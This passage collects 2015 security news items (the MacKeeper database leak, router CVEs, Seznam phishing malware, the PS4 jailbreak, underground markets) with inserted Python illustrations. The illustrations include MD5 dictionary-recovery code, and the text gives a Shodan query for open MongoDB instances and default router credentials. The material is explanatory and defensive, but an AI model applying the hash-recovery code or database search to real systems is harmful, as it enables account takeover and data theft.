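        return {(s, d): dict(v) for (s, d, vis), v in self.edges.items()
                if s == node and vis in authorisations}

    def age_off(self, now, max_age):
        """Drop every edge not seen within max_age seconds of now; return how many."""
        stale = [k for k, v in self.edges.items() if now - v["last_seen"] > max_age]
        for key in stale:
            del self.edges[key]
        return len(stale)


def build_sample_graph():
    """Constructed sample data: timestamps are seconds, labels are made up."""
    g = SummarisedGraph()
    g.add_edge("alice", "bob", 100, "public")          # hour 0
    g.add_edge("alice", "bob", 3700, "public")         # hour 1, same edge: merged
    g.add_edge("alice", "bob", 7300, "public")         # hour 2, same edge: merged
    g.add_edge("alice", "carol", 200, "secret")        # only visible with "secret"
    g.add_edge("bob", "alice", 25 * HOUR, "public")    # hour 1 of the next day
    return g


if __name__ == "__main__":
    g = build_sample_graph()
    print(g.edges_from("alice", {"public"}))
    print(g.edges_from("alice", {"public", "secret"}))
    print("aged off:", g.age_off(now=100_000, max_age=50_000))
```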
Why did GCHQ open-source its code?
It's pretty unusual for one of the most secretive intelligence agencies to release computer code online for anyone to use for free.
GCHQ is very well known for monitoring communications worldwide and was not at all expected to release its database software as open source on GitHub.
However, this move by GCHQ may be part of its effort to become friendlier to the hacker community and to attract new talent.
The spy agency also says it has already started working on Gaffer2, a project in which the agency aims to take "the best parts of Gaffer... to create a more general purpose graph database system."
What do you think about this move by GCHQ? Feel free to tell us in the comments below.

13 Million MacKeeper Users Hacked — 21 GB of Data Exposed
The MacKeeper anti-virus company is making headlines today for lax security that exposed a database of 13 million Mac users' records, including names, email addresses, usernames, password hashes, IP addresses, phone numbers, and system information.
MacKeeper is a suite of software that claims to make Apple Macs more secure and stable, but today the anti-virus itself needs some extra protection after a data breach exposed the personal and sensitive information of millions of its customers.
The data breach was discovered by Chris Vickery, a white hat hacker who was able to download 13 million customer records by simply entering a selection of IP addresses, with no username or password required to access the data.
21 GB Trove of MacKeeper Customer Data Leaked
31-year-old Vickery said he uncovered the 21 GB trove of MacKeeper customer data in a moment of boredom while searching on Shodan – a specialized search engine that looks for virtually anything connected to the Internet – for openly accessible databases that require no authentication.
"The search engine had indexed their IPs as running publicly accessible MongoDB instances (as some have already guessed)," Vickery said in a Reddit post. "I had never even heard of MacKeeper or Kromtech until last night. I just happened upon it after being bored and doing a random 'port:27017' search on Shodan."
As a result, four IP addresses took him straight to a MongoDB database, containing a range of personal information, including:
Customer Names
Email addresses
Password hashes
Mobile phone numbers
IP addresses
System information
Software licenses and activation codes
Security Product Using Weak Algorithm to Hash Passwords
Although the passwords were hashed, Vickery believes that MacKeeper was using weak MD5 hashes to protect its customers' passwords, allowing anyone to crack them in seconds using MD5 cracking tools.
The company responded to the issue after Vickery posted it on Reddit, saying that the company had no evidence the data was accessed by malicious parties.
"Analysis of our data storage system shows only one individual gained access performed by the security researcher himself," Kromtech, the maker of MacKeeper, said in a statement. "We have been in communication with Chris, and he has not shared or used the data inappropriately."
Though the company claims Vickery was the only person to access MacKeeper users' information, you should still change your MacKeeper password and the passwords on any websites where you use the same password.
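As an added illustration (not code from the article, MacKeeper or Kromtech) of why an unsalted MD5 digest is so cheap to reverse and what a stronger store looks like: a precomputed table over a small constructed wordlist recovers an MD5-hashed password by a single lookup, whereas a salted, iterated PBKDF2 hash forces per-password work and produces different digests for the same password, so no shared table can exist.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the public lists cracking tools use.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "macbook"]

# How cracking tools spend their time: lots of cheap hashes, then a dictionary lookup.
PBKDF2_ITERATIONS = 100_000


def md5_hex(password: str) -> str:
    """The weak scheme the article describes: one fast, unsalted digest per password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def md5_lookup_table(words):
    """Precompute digest -> plaintext once; every leaked hash is then a dictionary lookup."""
    return {md5_hex(w): w for w in words}


def recover_from_md5(digest: str, table: dict):
    """Return the plaintext if the leaked digest is in the table, else None."""
    return table.get(digest)


def pbkdf2_hash(password: str, salt: bytes = None, iterations: int = PBKDF2_ITERATIONS):
    """Salted, iterated hash: the per-user salt defeats shared tables, the iteration
    count makes each guess cost real work. Returns what a database would store."""
    salt = salt if salt is not None else os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, iterations, derived


def pbkdf2_verify(password: str, salt: bytes, iterations: int, expected: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(derived, expected)


if __name__ == "__main__":
    table = md5_lookup_table(COMMON_PASSWORDS)
    leaked = md5_hex("qwerty")                 # a digest as it would appear in the dump
    print("MD5 recovered:", recover_from_md5(leaked, table))
    salt, iters, stored = pbkdf2_hash("qwerty")
    print("PBKDF2 verifies:", pbkdf2_verify("qwerty", salt, iters, stored))
```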

Seznam warns of a virus that siphons contacts from phones

15.12.2015 Mobile

The portal is warning of a virus infection spreading among users of the largest domestic freemail service.
The virus works like this: on infected computers, a message appears after login that manipulates the user into downloading an application. That app then downloads all the contacts from the phone, but it can also intercept confirmation codes, for example for internet banking.

Seznam reminds users that it never asks them for a phone number and has no application for temporary passwords.

This is not the first time that users of Seznam freemail mailboxes have become victims of such an attack. Last June the malware posed as Seznam's Android e-mail app.

Now even Twitter reportedly warns of attacks by state-paid hackers

15.12.2015 Social networks

How could Twitter actually tell? And why is there a fashion for such warnings, especially in such a vague and meaningless form?
Roughly a month ago, Facebook's PR machinery came up with the idea of releasing a story about how state-paid hackers are trying to hack Facebook accounts and how Facebook will fight it. Even then it was rather odd, mainly as to how Facebook would recognise that it is precisely a "state-paid" hacker. But it served its purpose: the media wrote about it, praised it and blindly copied what Facebook's PR department had written.

According to "Twitter warns some users of possible 'government' hacking", it is now Twitter's turn to warn about hacking by "governments". Everything is again somewhat uncertain, because it is based on an e-mail that Twitter supposedly sent only to some users. It is also a bit odd that Twitter of all companies would recommend using Tor, instead of informing users how to secure their accounts better.

According to the article above, a Twitter spokesperson reportedly confirmed the authenticity of the e-mails but provided no further information. Which means we can close the whole matter the same way as in Facebook's case: a vague warning about something that is fairly obvious. If someone is an activist, politically active, in opposition to some government or simply a thorn in the side of some regime, it is quite clear that somebody will try to gain access to their online accounts, including attempts to extract information from them, especially information that could help reveal where they write their posts from.

What is a bit strange about Twitter's warning is that it mentions hackers' attempts to obtain IP addresses, because that is information which is not available inside a hacked account. The only things that could be obtained by hacking a Twitter account are the phone number the victim may have filled in and the e-mail address from which the account is managed. If someone were an activist and at the same time so careless as to use geolocation, no hacker is needed for that: the information is freely available both on tweets and possibly on photos (if the social network leaves it stored there; this is not only a Twitter matter).

You can be somewhat more paranoid and interpret Twitter's warning as an attempt by hackers to get not into your account but directly into Twitter's systems. There they could indeed get at IP addresses. But that would be a very big deal, and Twitter should rather come forward with some more concrete information than vague talk about "hackers" paid by "governments".

Routers are riddled with bugs: Belkin, ZyXEL, Netgear and others

15.12.2015 Vulnerabilities

Wireless routers intended for homes and small offices are riddled with security bugs for which no patches exist. The bugs were discovered in routers of various brands, including the best known: ZyXEL, Belkin, ReadyNet, Amped Wireless, Buffalo and Netgear. The same problems have been repeating for many years.

Belkin for the second time this month

Security analyst John Garrett of Ethical Reporting discovered several new serious vulnerabilities in Belkin wireless routers. Specifically, the routers designated AC-1750, AC-1200, N-600 and N-150 are affected.

Several problems were discovered, including path traversal (browsing directories on the system outside the document root) usable for attacks on various APIs, weaknesses allowing the router configuration to be changed, authentication bypass and even remote execution of malicious code.

Garrett published videos showing how the individual routers can be attacked even when running the latest official firmware. He also pointed out that Belkin and Linksys routers (same owner) contain an update interface that by itself opens a large security hole. Belkin has already responded to the discovered vulnerabilities and confirmed that it is preparing a firmware update with patches.

This is not the first recent problem with these routers: at the beginning of December, Indian analyst Rahul Pratap Singh discovered several vulnerabilities exploitable to compromise the router. They can be used, for example, to crash the router's web interface, guess the session ID and abuse an open telnet service with the credentials root/root.

Netgear with fake DNS records

Joel Land of the CERT Coordination Center (CERT/CC) at Carnegie Mellon University published a whole series of security advisories last week reporting security holes in various router models.

He discovered that the Netgear G54/N150 (WNR1000) with the latest firmware, and apparently older versions too, contains a bug designated CVE-2015-8263 that can be exploited to inject fake DNS records, which are then handed out to clients. Users can thus be silently redirected to phishing servers controlled by the attacker.

The router is susceptible to classic DNS cache poisoning (refined in the form of the Kaminsky vulnerability), which is over seven years old. It uses a single source port for all DNS queries, so it is easy for an attacker to craft a fake response that is mistakenly matched to a legitimate request. Requests and responses are matched only by port number and a guessable 16-bit query ID.
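As an added worked calculation (not from the article or the CERT/CC advisory) of the point above: the resolver accepts a forged reply only if it matches both the transaction ID and the source port, so the defender's question is how many guesses that costs. With a fixed source port the attacker guesses only the 16-bit ID; with randomised source ports the space grows by another roughly 16 bits, which is why source-port randomisation has been the standard mitigation since the Kaminsky disclosure. The forged-replies-per-round figure is a constructed parameter, not a measurement.

```python
import math

TXID_BITS = 16  # the DNS transaction ID is a 16-bit field in every implementation


def guess_space(port_bits: int, txid_bits: int = TXID_BITS) -> int:
    """Number of distinct (source port, transaction ID) pairs a forged reply must hit.

    port_bits is the entropy the resolver puts into its source port: 0 for a fixed
    port like the router in the text, about 16 for a randomised port.
    """
    return 2 ** (port_bits + txid_bits)


def round_success_probability(forged_replies: int, port_bits: int) -> float:
    """Chance that one burst of distinct forged replies (sent before the real answer
    arrives) contains the correct pair; capped at 1 once the whole space is covered."""
    return min(1.0, forged_replies / guess_space(port_bits))


def rounds_for_confidence(confidence: float, forged_replies: int, port_bits: int) -> int:
    """Rounds of fresh lookups needed until the cumulative success chance reaches
    `confidence`, assuming each round is an independent attempt with probability p."""
    p = round_success_probability(forged_replies, port_bits)
    if p >= 1.0:
        return 1
    # Solve 1 - (1 - p)^k >= confidence for k; log1p keeps precision for tiny p.
    return math.ceil(math.log(1.0 - confidence) / math.log1p(-p))


def compare_mitigation(forged_replies: int = 1000, confidence: float = 0.5) -> dict:
    """Side by side: fixed source port versus randomised source port."""
    return {
        "fixed_port":      rounds_for_confidence(confidence, forged_replies, port_bits=0),
        "randomised_port": rounds_for_confidence(confidence, forged_replies, port_bits=16),
    }


if __name__ == "__main__":
    print("guess space, fixed port:     ", guess_space(0))
    print("guess space, randomised port:", guess_space(16))
    print("rounds to 50% success:       ", compare_mitigation())
```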

ZyXEL with password 1234

Another current advisory from CERT/CC covers two bugs exploitable in the ZyXEL NBG-418N router with firmware 1.00(AADZ.3)C0. The manufacturer was informed of the bugs back in October. Once again, guessable default credentials admin/1234 were discovered that can be abused for remote login to the device (CVE-2015-7283).

The bug can be combined with a cross-site request forgery (CSRF) vulnerability discovered earlier in the same router (CVE-2015-7284). A remote attacker can abuse it to run their own code in the same context in which the router administration runs for the legitimate user.

An attacker can thus remotely perform actions with the same privileges as the administrator, provided the user has an active connection open to the router through which it can receive the attacker's forged requests. Combined with the default credentials, the attacker can moreover open that access themselves and need not wait for the victim to log in to the administration interface.

Bugs in ReadyNet, Amped Wireless and Buffalo routers

Security experts from CERT/CC also warned of default credentials (CVE-2015-7280), a CSRF vulnerability (CVE-2015-7281) and DNS spoofing (CVE-2015-7282) in ReadyNet routers. The discovered problems were tested on the ReadyNet WRT300N-DD router with firmware 1.0.26. The manufacturer learned of them back in September.

Similarly, default credentials (CVE-2015-7277), CSRF (CVE-2015-7278) and DNS spoofing (CVE-2015-7279) were discovered in the Amped Wireless R10000 router (firmware version not stated). The manufacturer received the information back in July.

Buffalo AirStation Extreme N600 routers (WZR-600DHP2) also have a bug enabling DNS spoofing (CVE-2015-8262). It affects firmware versions 2.09, 2.13 and 2.16, and probably others.

The same old song

It is unbelievable that for ten (or more) years the same bugs keep appearing: a leaky web interface, a badly configured web server, a web interface open to the internet, embarrassing default credentials and a non-functional check for current firmware. In the worst case it is possible to remotely access the router's memory, including all settings and passwords.

Until we are able to solve this problem satisfactorily, we can occupy ourselves with security over and over, but our data will travel from the router to who knows where. The OpenWRT project solves this elegantly: it prepares alternative Linux firmware for many routers and updates it regularly. The question is why none of the manufacturers adopts it and uses it in their hardware, instead of cobbling together their own, obviously leaky solutions.

Fraudsters pose as Seznam's e-mail service, trying to rob people of their money

15.12.2015 Phishing
A computer virus posing as the official application of Seznam's Email service has once again begun spreading across the Czech internet. Through it, cybercriminals try to persuade users to install a further fraudulent application on their mobile phone. That app then lets them drain the victim's bank account, since it can bypass even confirmation by SMS message.
Today 14:47
On computers infected with the virus, a message appears after logging in to Email claiming that the Czech internet number one is introducing a new technology, One-Time-Password.

"One-Time-Password is a system for generating one-time passwords for access to your account, valid for one minute. For your convenience we have prepared a simple and convenient application for smartphones. Now, at each login to your account, you need to open our application," the fraudsters claim in the fraudulent pop-up window.

We are not urging anyone to install anything in order to log in to our services.
Seznam spokesperson Irena Zatloukalová
The main problem is that the virus activates only upon login to Email; until then it merely hides in the depths of the operating system. Some users may therefore mistakenly believe it is a genuine request from Seznam.

But the company never communicates with users in this way. "We have no application for temporary passwords. Nor are we urging anyone to install anything in order to log in to our services. Such behaviour of the computer is caused by a computer virus," Seznam spokesperson Irena Zatloukalová said.

According to her, the malicious code is most often spread via file-sharing servers; it may, for example, be bundled with pirated copies of some software. Equally, though, this uninvited guest can settle into a computer after the user opens attachments of unsolicited mail, and the like.

They take over the whole phone
Through the fraudulent application called SeznamOTP, the attackers gain full access to the compromised smartphone. This lets them eavesdrop on internet communication, including entered passwords, and manipulate incoming messages.

Once the attackers have full control of the smartphone, they can easily gain access, for example, to internet banking authorisation messages. They are then only a step away from emptying people's accounts or taking out a loan through them.

Practically the same scenario was used by the attacks that began terrorising Czech internet users last June. [full report]

You can see how the attack proceeds step by step in the images below.

1. In the first step, the fraudsters try to extract the user's mobile number.
2. So that the user does not become suspicious, the attackers describe each step in advance, just as legitimate installations do.
3. Users can tell that the fraudulent app's behaviour is not standard from the fact that the installation proceeds without verification.
4. In the next step, the app itself warns that it will gain access to practically the complete administration of the phone. Less attentive users may not notice this, however.

5. Using the genuine Email logo, the program tries to give the impression that the official application has been installed.
6. The fraudsters verify that the installation of the fraudulent app on the phone really took place by means of a "licence" key.

Security in 2020? Intel looked into its crystal ball

15.12.2015 Security
The five-year outlook attempts to predict how the nature of threats will change, how attackers' behaviour and targets will change, and how the industry will respond to these challenges over the next five years.

Attacks below the OS. Attackers could target weaknesses in firmware and hardware, as applications and operating systems are increasingly well protected against conventional attacks. The lure will undoubtedly be the broad degree of control attackers can gain through such attacks, since they will be able to reach an unlimited number of resources and seize administrative and control functions.
Evading detection. Attackers will try to avoid detection by shifting to other targets, using sophisticated attack methods and actively evading security technology. Hard-to-detect attack styles will include fileless threats, encrypted infiltration, sandbox-evading malware, abuse of remote shells and remote control protocols, as well as the above-mentioned below-OS attacks targeting the MBR, BIOS and firmware.
New devices, new attack surfaces. Although there has not yet been a rise in attacks via IoT and wearable electronics, by 2020 the installed base can be expected to reach a level sufficient to attract attackers. Technology vendors and vertical solution providers will work together to create guidance for safe use and best practices, and to build security functions into device architecture wherever possible.
Cyber espionage in corporate guise. McAfee Labs expects that the black market for malware and hacking services could enable the use of cyber-espionage malware in the public sector, and that corporate attacks could be used to gather financial information and manipulate markets in the attackers' favour.
Privacy threats, opportunity. The volume and value of personal digital data will continue to grow, which will further attract cybercriminals and potentially lead to new privacy regulations worldwide. At the same time, individuals will seek and obtain compensation for sharing their data, a market will form around this "value exchange", and the environment shaped by this market could change how individuals and companies approach digital privacy.
The security industry's response. The security industry will develop more effective tools to detect irregular user activity that could indicate compromised accounts. Information sharing will lead to faster and better protection of systems. Security devices integrated with the cloud will offer better visibility and control. Automated detection and correction technology promises to protect companies from the most common attack types, freeing IT departments to focus on critical security incidents.

Symantec root certificate is untrusted, says Google

15.12.2015 Threats
Website administrators and developers who work with certain Symantec certificates should obtain new ones.

Android OS, the Chrome browser and other Google products will stop trusting certificates chained to a twenty-year-old VeriSign root certificate.

The report came after Symantec revealed plans to gradually wind down the Class 3 Public Primary Certification Authority, which it acquired five years ago.

In the end-of-support announcement, the company states that it has not used the root certificate, which is trusted by most browsers and operating systems, since 1 December, and recommends that all owners of digital certificates chained to it obtain new ones chained to a more modern root certificate. All are available free of charge.

According to Google, Symantec will not stop using the Class 3 Public Primary CA entirely, but plans to use it for other, as yet unspecified purposes. The maker of the popular browser, however, cannot guarantee that non-public certificates issued under that root will not be misused to "disrupt or influence the secure communications of Google products or their users".

"Because Symantec is reluctant to specify the new uses of these certificates in more detail, and because the company is aware of the risk that such conduct poses to users of Google products, it has asked us to remove this root certificate and add it to the untrusted list," explains Ryan Sleevi, one of Google's developers.

The company is therefore adding two versions of the Class 3 Public Primary CA to the untrusted list: one signed with the increasingly disused SHA-1 hash function, the other signed with the even older MD2. Both were issued in 1996 and are due to expire in 2028.

According to Google, however, Symantec does not believe that any of its clients operating HTTPS sites, or their users, should be affected by this step. In its own advisory, Symantec nevertheless admits that users attempting to visit websites chained to the untrusted root certificate may encounter error messages in the future.

This may also apply to signed applications if operating system vendors also begin removing the Class 3 Public Primary CA from their trusted lists. Affected developers should therefore update their certificates as well.

Back in November, Symantec also informed all major browser vendors that they should remove the VeriSign Class 3 Public Primary CA G1 (PCA3-G1) from their trusted certificate lists, since it is based on an older, less secure protection scheme.

This root certificate, however, has not been used to generate new certificates for several years, so its removal should pose no risk to the public internet. According to Symantec spokesman Noah Edwardsen, the company wants to use it only internally, as a supporting root, for its corporate clientele.

Fake banker offers a quarter of a billion crowns found in accounts by e-mail

15.12.2015 Spam
Just send your contact details and the fairy-tale inheritance is yours. This tempting offer is being sent out by e-mail by a man calling himself Andrew Brown. In all likelihood, however, he is a fraudster.
"Hello, friend I am Dr. Andrew Brown's audit head of department NATWEST BANK LONDON Harlesden," so begins the e-mail, which the editors of Právo have at their disposal.

A business proposal follows which, as Brown explains in broken Czech evidently produced by an online translator, will be beneficial for both parties.

"In my department being chief of operation of the larger regional office in London I have discovered an amount of 16.5 million pounds (627 million crowns) in account that belongs to one of our foreign customers," is how Brown summarises his situation.

The money is said to belong to the Jewish multimillionaire from Mexico Tomáš Saba Masri, who died five years ago in a plane crash. His wife, son and daughter-in-law died with him.

"The pilot was also dead," Brown adds, and with that all hopes of a happy ending are extinguished.

A tempting offer
After the tragic passage, however, comes the tempting one. Brown explains that no relatives of the deceased multimillionaire have claimed the inheritance, although he waited for them long enough. And so it is the e-mail recipient's turn.

"I am to seek your consent to you as next of kin / will be beneficiary of the deceased so that the proceeds of this account valued at 16.5 million pounds, may be paid to you," Brown offers, adding that he will keep 60 percent and transfer 40 percent to you. The resulting sum is thus roughly 251 million crowns.

Brown admits that it is you who should pose as the relative, so that the two of you can split the inheritance. Naturally he appeals to trust and cooperation, and adds that everything will be settled in court and done by legal means.

"It will be executed"
"I guarantee you that it will be executed under a legitimate arrangement that will protect you from any breach of the law," he adds; the Czech text rendered "executed" as "popraven" (put to death), whereas the second meaning of the English word, carried out, was probably intended.

Brown then asks the e-mail recipient to send him their contact details, ideally quickly, because he has only seven days to arrange everything.

All it takes is to provide a first name and surname, telephone number, contact address, occupation, age, sex and nationality, and in time, according to his promises, the addressee will become the owner of 251 million crowns.

"Seek this, let me know your decision, rather than me waiting," Brown concludes his offer. Because of the poor translation the whole e-mail is hard to read. Below it, however, is an English version, which is more intelligible.

Definitely do not reply
The whole thing looks like an outright fraud, and not a very well thought-out one at that. It is not clear why a banker from London should be sending the inheritance of a deceased Jewish multimillionaire from Mexico to the Czech Republic. The police are clear on the question of possible fraudulent e-mails.

"There is only one piece of advice: do not reply to such e-mails. Definitely do not send money anywhere or give out your personal details or login details for internet banking," warned Pavel Hanták, spokesman for the Unit for Detection of Organised Crime.

It is the officers of that unit who investigate computer crime and similar fraudulent attempts to extract personal data, or money directly, from trusting people.

Darknet: The dark side of the internet

15.12.2015 Security
A space for trading in weapons, drugs, child pornography or illegal betting. All of this is offered by the internet underworld commonly referred to as the darknet, and Czechs are involved in it too.

The darknet functions as a hidden layer of the regular internet; it operates on the principle of anonymous connection through encrypted, decentralised networks that communicate directly between individual users (peer-to-peer).

Requests that you would normally send from your IP address go through randomly selected nodes, so that, in layman's terms, you are invisible. A number of browsers provide access to the darknet; the most popular are, for example, Tor, I2P and Freenet.

"Tor is based on forwarding communication through a network of servers participating in the system, where the internet addresses of the sender and the recipient are never both readable at any step of the path, so the recipient knows only the address of the last intermediary machine and it is therefore impossible to determine who is communicating with whom. Data is sent from the sender in encrypted form to the first onion router in the chain, and all further communication between routers is encrypted as well (each connection with a different shared key)," says Vladimír Smejkal, author of the book Kybernetická kriminalita.

According to him, each router knows only who it received the data from and where to forward it. The content of the data, or its source, therefore cannot be traced. Moreover, access to this hidden network is possible only for its users; from outside, to ordinary internet users, the network is inaccessible.

It is therefore said to be ideal for anyone who wants to send information, whether to specific recipients or to an unspecified circle of participants, and share it with them with a minimal risk of exposure.

An example of shameful conduct is the activity of the online marketplace known as Silk Road, which functioned essentially as an eBay for drugs. The exchange, with a turnover of 1.5 billion dollars, is no longer operating, and its operator Ross Ulbricht received a life sentence. There is, however, a whole range of such marketplaces, and the authorities' fight against them is a Sisyphean task. The case did show, though, that even the darknet is not impenetrable.

Among the most significant darknet markets are, for example, Alphabay, Ramp and German Plaza. According to experts there is probably no Czech equivalent, but Czech users use the foreign ones.

The biggest boom in the number of daily accesses by domestic users came at the end of September 2013, when it exceeded 40,000. Since then there has been a considerable decline, and the figure has held slightly below 15,000 daily accesses.

Compared with other countries we are thus a darknet dwarf; in the overall ranking by number of daily accesses we sit somewhere between Greece and Saudi Arabia. The ranking is dominated by Russia, Germany and, above all, the USA, with up to 400,000 daily accesses.

"Although from the perspective of these statistics the Czech Republic appears to be a negligible player, it is on the contrary a major power when it comes to adoption of the technologies associated with the darknet. Specifically, in the Tor network mentioned above, widely used around the world for anonymous access to information both inside and outside the darknet, we rank at the top in terms of the number of so-called 'exit nodes' hosted on Czech territory. These are servers through which the communication path of all users of the network leads," says Jiří Slabý, Senior Manager in the Consulting department at Deloitte.

As far as content is concerned, the Czech darknet community is more in the nature of enthusiasts interested in modern technology than of criminals with a fondness for IT.

Evidence of this is, for example, the hackerspace Brmlab, based in Prague's Holešovice district. It is an open community whose aim is to share information and ideas with like-minded enthusiasts; it also holds numerous social gatherings and workshops for anyone interested.

Hacker claims Sony PlayStation 4 Jailbreak


A dream comes true for many Sony PlayStation 4 users: a hacker has developed a jailbreak for the popular, heavily armoured console.
The Sony PlayStation 4 is considered one of the best-protected platforms; until now it was impossible to run pirated games, but a hacker who calls himself CTurt claims to have developed a fully jailbroken version of the PlayStation 4 with the help of a kernel exploit that he had created previously.

CTurt used the exploit on PlayStation 4 firmware v1.76 to inject his own code into the PS4 and gain control of the gaming platform.

“Just broke WebKit process out of a FreeBSD jail (cred->cr_prison = &prison0). Guess you could say the PS4 is now officially “jailbroken” :P” states a Tweet sent by CTurt.

According to the message above, the exploit currently only works on PlayStation 4 firmware version 1.76, but the expert believes it can be modified to work on more recent firmware.
How does it work?

According to the hacker, the jailbreak allows the Sony PlayStation 4's RAM to be dumped from other processes and allows the installation of custom firmware, which could be used to run homebrew applications that are not normally allowed by the security restrictions implemented by Sony.

“While it could take time before CTurt and other hackers are able to develop custom firmware along with the method to load it on the video game console, it should be noted that the exploit can also be taken advantage of to have the console run pirated software.” reported

Clearly, if the news is confirmed, we will observe a huge impact on the gaming market.

What will Sony's reply be?
Obviously, the company will analyse the exploit in order to discover the vulnerabilities exploited by the hacker and fix them in the most recent version of the PlayStation 4 firmware.

Every month attackers steal 77 thousand Steam accounts

14.12.2015 Incidents

If you use the Steam gaming platform, now may be a good time to secure your account with two-factor authentication. Accounts are being stolen on a large scale.
Steam is a useful place to acquire games, whether free, trial or paid. Over the years of its existence, Steam (Valve) has managed to build a very usable store for computer games. In proportion to its popularity, but mainly also to the fact that Steam accounts can be used both to buy and to sell (virtual goods), attackers' interest is growing too.

In Security and Trading, Valve points out that account theft has occurred on Steam since the very beginning, but that after the introduction of trading between users (Steam Trading) the number of thefts grew as much as twentyfold.

Usually it works like this: the attacker steals your account, sells everything on it that can be sold, and pockets the money. In many cases the sale does not take place directly from the stolen account; the items change hands several times and are sold from an entirely different account. The stolen items need not even be sold quickly; the hackers are happy to wait several months.

Valve originally accommodated robbed users and returned the stolen account to them, including the items on it. The number of thefts, however, is now so large that this solution has ceased to be the only acceptable one. Moreover, as Valve points out, the thefts today no longer affect only inexperienced and careless users. In the above-mentioned notice, Valve states that account theft on Steam is now the work of a highly organised network and amounts to as many as 77 thousand stolen accounts per month.

Valve recommends thinking very seriously about two-factor authentication and adding an authenticator to your Steam account. For Valve, however, even this solution has brought some new problems, for example that if the two-factor authentication took place on a compromised PC, it would not work.

Alongside the introduction of two-factor authentication, Valve is also trying to protect accounts that are not protected by a second factor. It is introducing a range of restrictions on trading speed for them, which is essentially another good incentive to get an authenticator.

Twitter warned of hacker attacks. Suspicion falls on China and North Korea

14.12.2015 Social networks
The social network Twitter has warned some users that state-sponsored hackers may have attempted to obtain sensitive data from their accounts. According to the Reuters agency, this is the first such warning Twitter has issued.
The hackers reportedly targeted "a small group of accounts". Nothing suggests, however, that they succeeded in obtaining sensitive information. The company did not say whom it suspects in its investigation.

The Canadian non-profit organisation Coldhac received the warning from Twitter on Friday. The hackers may have tried to steal data such as "e-mail addresses, IP addresses and/or telephone numbers". One of its directors, Colin Childs, told Reuters that the organisation had not noticed any apparent impact from the attack.

Western companies and governments have been targets of cyber attacks before. The governments of China and North Korea have come under suspicion. The government in Pyongyang, however, persistently denies any involvement in security breaches.

Inside the German cybercriminal underground

Trend Micro investigated on German crime forums and concluded that Germany possesses the most advanced cybercrime ecosystem in the European Union.
We have reported several times on news related to various cybercriminal underground communities in the wild, such as the American underground, the Russian underground, the Brazilian underground, the Chinese underground and also the Japanese one.

What about the European cybercriminal underground?

This time we will talk about the German cybercriminal underground. Trend Micro investigated German crime forums and concluded that Germany possesses the most advanced cybercrime ecosystem in the European Union, beating known markets such as the French and Spanish ones.

The Trend Micro survey examined 10 big crime forums, some of them holding a registered, active base of between 20,000 and 70,000 users. The findings of the investigation are available in the paper titled U-Markt: Peering into the German Cybercriminal Underground.

“The German underground does not have as wide a selection of offerings as the Russian market. In most cases, it isn’t necessary to search for special goods and services in local communities because global (English-speaking) markets have more to offer. But when it comes to customized wares, it is harder to find appropriate equivalents. This is a niche that smaller communities (like the German underground) need to find in order to thrive and stay up,” reads the paper.

In these places it is quite easy to buy any kind of illegal product or service, including:

Malware (Trojans, bank-stealers and backdoors)
Bulletproof hosting services (BPHSs), used to store malware components and exploit kits
Fake IDs
Hacked accounts
Crypting services
Banner ads, the paper notes, “are an easy way to promote partner sites (a marketplace run by those behind a certain forum in any community, most notably in the Russian underground). These can help marketplaces widen their client bases.”

Very interesting is the Packstation service, described in the report as a delivery method exploited by criminals that takes advantage of the German postal service.

“Most underground markets rely on droppers who cash in stolen credit cards and online accounts. There is no longer a need for droppers in the German underground. Users instead rely on the so-called “Packstation service” that takes advantage of the German postal service. This allows sellers to put goods sold in publicly accessible metal boxes for their buyers to pick up using their pTANs and access cards.”

The advantage of the “Packstation” resides in the fact that cybercriminals can easily perform an “exchange of goods and payment. Users’ addresses cannot be tracked though they need to apply for the service using a physical (home) address and a mobile phone number (which are easy to fake) so they can receive short messaging service (SMS) notifications along with their pTANs to claim their parcels.”

What really makes the German cybercriminal underground the most advanced in the whole European Union? The answer is Russia: both German and Russian underground forums are full of carding service banner ads. These ads are normally associated with Russian underground offerings but are heavily advertised on German forums.

A good example is “”, one of Russia’s biggest stolen credit card marketplaces, which is being advertised in the German underground; “” is another, but there are more.

Trend Micro also published the list of usernames per forum, probably to help future investigations.

I believe we will keep seeing more and more news about this cybercriminal underground due to the rapid growth of black markets.

This is How Tokyo Police Are Catching Rogue Drones in the Sky
This Police Drone Fights Rogue Drones in the Sky
So how do you catch rogue drones that take your sky?
With another Giant Drone, of course!
This is exactly how the Tokyo Metropolitan Police Department is catching unwanted and potentially dangerous drones flying over the city, according to Japan Today.
The department is launching an anti-drone squad in order to prevent people from flying their drones over crowded residential areas and important buildings in Tokyo, including the Prime Minister's Office.
How So?
Instead of using a dragnet on the ground, the police will use a drone armed with a net to scoop up suspected drones and carry them away to safety.
The Tokyo Metropolitan Police have also released a video that shows its special net-wielding drone in action.
It looks like the police are using a DJI Spreading Wings 900 with a 3 m x 2 m net tied to its feet.
As soon as a rogue drone is spotted in the sky, the squad will first attempt to contact its operator and order them to land the drone.
However, if the drone operator fails to comply, the anti-drone squad will release their net-wielding drone to capture the drone and drag it away to safety. This move came in the wake of last April's incident, when a suspicious drone carrying radioactive material from Fukushima Prefecture was found on the roof of the Japanese Prime Minister's Office.

Hacker Confirms PlayStation 4 Jailbreak! Exploit Could Open Doors for Pirated Games
Sony's PlayStation 4, the hottest-selling gaming console in the United States, has been on the market for a while now, and since its release hackers have been tinkering with it to find a way to run unauthorized software.
Though breaking the protection on PlayStation 4 is a huge deal, a hacker who calls himself CTurt has claimed to develop a fully jailbroken version of the PlayStation 4 with the help of a kernel exploit that he previously created.
The current jailbreak allows dumping of the system RAM from other processes and installing custom firmware that can be used to run homebrew applications that aren't approved by Sony.
Of course, there are still a few other security issues to get past, but it is a foot in the door for game piracy, which can affect the gaming market as a whole.
The Twitter account of CTurt seems to indicate that currently the exploit only works for PlayStation 4 firmware version 1.76, but apparently it can be tweaked to work for more recent firmware.
CTurt successfully managed to take advantage of an exploit in PlayStation 4 v1.76 to inject external code into the system, thereby taking control of the hardware.
Sony would certainly be unhappy with the launch of PlayStation 4 jailbreak and would be trying hard to eliminate any vulnerabilities for the most recent version of PS4 firmware.

Gift cards and return merchandise fraud scheme

